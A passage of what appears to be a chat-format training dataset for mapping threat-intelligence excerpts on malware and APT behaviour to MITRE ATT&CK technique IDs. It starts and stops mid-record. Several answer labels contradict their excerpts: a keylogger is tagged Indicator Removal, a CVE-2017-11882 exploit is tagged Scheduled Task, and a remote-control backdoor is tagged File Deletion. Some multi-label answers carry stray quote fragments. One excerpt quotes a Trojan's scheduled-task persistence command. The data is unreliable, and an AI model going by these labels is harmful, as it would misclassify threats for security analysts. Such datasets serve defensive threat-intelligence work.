or Word document to execute an embedded payload. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth checks for the presence of Avast antivirus in the \"C:\\Program\\Files\\\" folder."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF/WebP file header magic/fields) and encoding the resulting WebP file"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify peripheral devices on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs can download and launch additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar uploads files from a specified directory to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses certutil and BITSAdmin to download additional malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command Number – a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID – can be one of the following commands: 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument. 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cmd.exe and /bin/bash to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMI can be accessed using a variety of tools, including the Windows WMI Command-line (wmic.exe), or through APIs accessible to programming and scripting languages such as PowerShell"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windows AppLocker allows administrators to control which executable files are denied or authorized to execute. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. A number of legitimate Windows executables that are not blocked by the default AppLocker policies has been discovered and various proof of concept AppLocker bypass code became publicly available. Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. To bypass AppLocker and launching script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. It takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when invoked through a call placed within the <xsl:value-of> tag. Invoking the JScript code of the payload dropper within an XSL file The supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis"
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This script is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate). The same can be found in Pony 1.9 code"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks /Create /SC MINUTE /MO 3 /TN “InetlSecurityAssistManager” /TR “wscript %path%” /f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use \"New-GPOImmediateTask\" to modify a GPO that will install and execute a malicious Scheduled Task/Job."
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke installed a cron job that downloaded and executed files from the C2."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to find information about the operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can acquire local and domain user account information."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has dropped their malware into legitimate installed software paths including: `C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`, `C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitRdr64.exe`, `C:\\Program Files (x86)\\Adobe\\Flash Player\\AddIns\\airappinstaller\\airappinstall.exe`, and `C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd64.exe`."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. If the decrypted payload is valid, it picks a specific existing Windows Service — LanmanServer, which is run by svchost.exe — and injects the decrypted shellcode into the legitimate service"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Any other command that doesn’t fit the above patterns will be forwarded and processed as an argument to ‘cmd.exe /c’ and run via the ‘ShellExecuteW’ API. Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "registers itself as a service on the victim’s machine to run as a standalone process."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT15 then used a tool known as RemoteExec (similar to Microsoft’s Psexec) in order to remotely execute batch scripts and binaries"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can collect the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of domain groups with the command \"net localgroup /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as \"net group /domain\" can be used in Net to gather information about and manipulate groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has performed credential dumping with and Lazagne."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can steal data from the victim’s clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim’s username and whether that user is an admin."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "loads malicious shellcode and executes it in memory."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Let’s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company’s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has the ability to use an embedded SOCKS proxy in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CTU analysis of one of GOLD KINGSWOOD's campaign using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1593.001 - Social Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hcdLoader installs itself as a service for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. Generally, malware loads a DLL, iterates over the set of exports of the DLL and hashes the string, looking for a matching hash. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum was seen using a keylogger tool to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT is capable of manipulating and deleting registry keys."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has inserted garbage characters into code, presumably to avoid anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy has a command to create a scheduled task for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated"
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise encrypts several of its files, including configuration files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.Figure 2: Example malicious Excel documentSimilar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMould can send commands to C2 in the body of HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has used cmd.exe to run its self deletion routine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the ‘-p’ parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Camellia cipher to encrypt communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT uses mshta.exe to run malicious scripts on the system."
- },
- {
- "role": "assistant",
